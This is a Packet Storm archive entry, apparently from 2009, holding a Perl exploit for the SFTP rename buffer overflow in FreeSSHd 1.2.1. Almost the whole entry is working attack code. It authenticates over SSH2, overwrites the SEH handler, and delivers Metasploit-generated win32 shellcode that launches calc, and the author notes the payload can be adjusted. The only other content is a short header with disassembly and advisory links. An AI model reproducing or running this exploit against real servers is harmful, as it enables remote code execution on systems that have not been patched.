FreeSSHd 1.2.1 Remote Buffer Overflow Exploit

2009-03-27T00:00:00
ID PACKETSTORM:76112
Type packetstorm
Reporter r0ut3r
Modified 2009-03-27T00:00:00

Description

                                        
                                            `# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit  
#  
# Advisory: http://www.bmgsec.com.au/advisory/45/  
# Original: http://www.bmgsec.com.au/advisory/32/  
# Related : http://www.bmgsec.com.au/advisory/42/  
#  
# Test box: WinXP Pro SP2 English  
#  
# Exploit code for a vulnerability I discovered sometime  
# ago in FreeSSHd 1.2.1. This code should be run from a   
# user titled "root", or adjust the payload for your   
# username. I've left space for adjustments. Up to the  
# first six NOPs can be used (inclusive).   
#  
# The code exploits a vulnerability in the SFTP Rename  
# operation. The vulnerability was patched in 1.2.2  
#  
# 00416F98 50 PUSH EAX   
# 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]  
# 00416F9F 50 PUSH EAX   
# 00416FA0 E8 45B50400 CALL <JMP.&MSVCRT.strcpy>   
#  
#  
# Written and discovered by:  
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)  
  
use Net::SSH2;  
  
my $user = "root";  
my $pass = "yahh";  
  
my $ip = "127.0.0.1";  
my $port = 22;  
  
my $ssh2 = Net::SSH2->new();  
  
print "[+] Connecting...\n";  
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";  
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";  
print "[+] Sending payload\n";  
  
$nop = "\x90";  
$padding = 'A' x 105;  
  
my $SEH = "\x21\x11\x40\x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe)  
my $nextSEH = "\xEB\xF0\x90\x90"; # jmp short 240, nop, nop  
  
$mShellcode = "\xE9\xF2\xFE\xFF\xFF";  
  
# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com  
my $shellcode =  
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02".  
"\x28\x29\x10\x83\xeb\xfc\xe2\xf4\xfe\xc0\x6d\x10\x02\x28\xa2\x55".  
"\x3e\xa3\x55\x15\x7a\x29\xc6\x9b\x4d\x30\xa2\x4f\x22\x29\xc2\x59".  
"\x89\x1c\xa2\x11\xec\x19\xe9\x89\xae\xac\xe9\x64\x05\xe9\xe3\x1d".  
"\x03\xea\xc2\xe4\x39\x7c\x0d\x14\x77\xcd\xa2\x4f\x26\x29\xc2\x76".  
"\x89\x24\x62\x9b\x5d\x34\x28\xfb\x89\x34\xa2\x11\xe9\xa1\x75\x34".  
"\x06\xeb\x18\xd0\x66\xa3\x69\x20\x87\xe8\x51\x1c\x89\x68\x25\x9b".  
"\x72\x34\x84\x9b\x6a\x20\xc2\x19\x89\xa8\x99\x10\x02\x28\xa2\x78".  
"\x3e\x77\x18\xe6\x62\x7e\xa0\xe8\x81\xe8\x52\x40\x6a\x56\xf1\xf2".  
"\x71\x40\xb1\xee\x88\x26\x7e\xef\xe5\x4b\x48\x7c\x61\x28\x29\x10";  
  
my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;  
  
my $sftp = $ssh2->sftp();  
$sftp->rename($payload, 'B');  
  
print "[+] Sent";  
$ssh2->disconnect;  
  
  
`